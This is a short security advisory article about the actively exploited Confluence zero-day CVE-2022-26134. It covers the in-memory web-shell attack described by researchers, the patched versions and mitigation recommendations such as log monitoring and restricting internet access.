About the vulnerability: Hackers extensively exploited this zero-day issue to primarily target internet-exposed servers. Cybersecurity specialists have identified this 0-day vulnerability as "CVE-2022-26134." The vendor's supported Confluence Server and Data Center versions are all vulnerable to this zero-day issue.
• According to the study, the servers that have not been patched As of yet, cybersecurity specialists have been unable to determine the earliest version that was compromised.
• It has also been included in the CISA's "Known Exploited Vulnerabilities Catalog" in acknowledgment of its disclosure as an actively exploited vulnerability.
• "The attacker executed a single exploit attempt against each of the Confluence Server systems, which in turn loaded a malicious class file into memory." This effectively gave the attacker a web shell with which to engage via subsequent queries. The advantage of such an attack was that the attacker did not have to constantly re-exploit the server and could execute commands without publishing a backdoor file to disc." Researchers stated.
• While the CISA strongly advises agencies on the government's network to restrict all internet connections to Confluence-related servers. Affected and patched versions
• The company has provided several updates, and all customers are recommended to upgrade their appliances to avoid future difficulties. There is a serious risk that this vulnerability will affect all current versions of the product on the market.
• What about the patched versions, though? There is no need to be concerned because we have listed all of the versions that have the patch for you below:-
7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1
Recommendation
• Check that all internet-facing access to the Confluence server and data center has been disabled.
• When monitoring your Internet-facing web services, make sure you have log retention regulations in place as well as robust monitoring capabilities.
• Send log files from each web server that has Internet connectivity to a SIEM or Syslog server.
• Keep a look out for suspicious child processes of web-application processes.
• To control access to the internet, you must implement a list of IP addresses.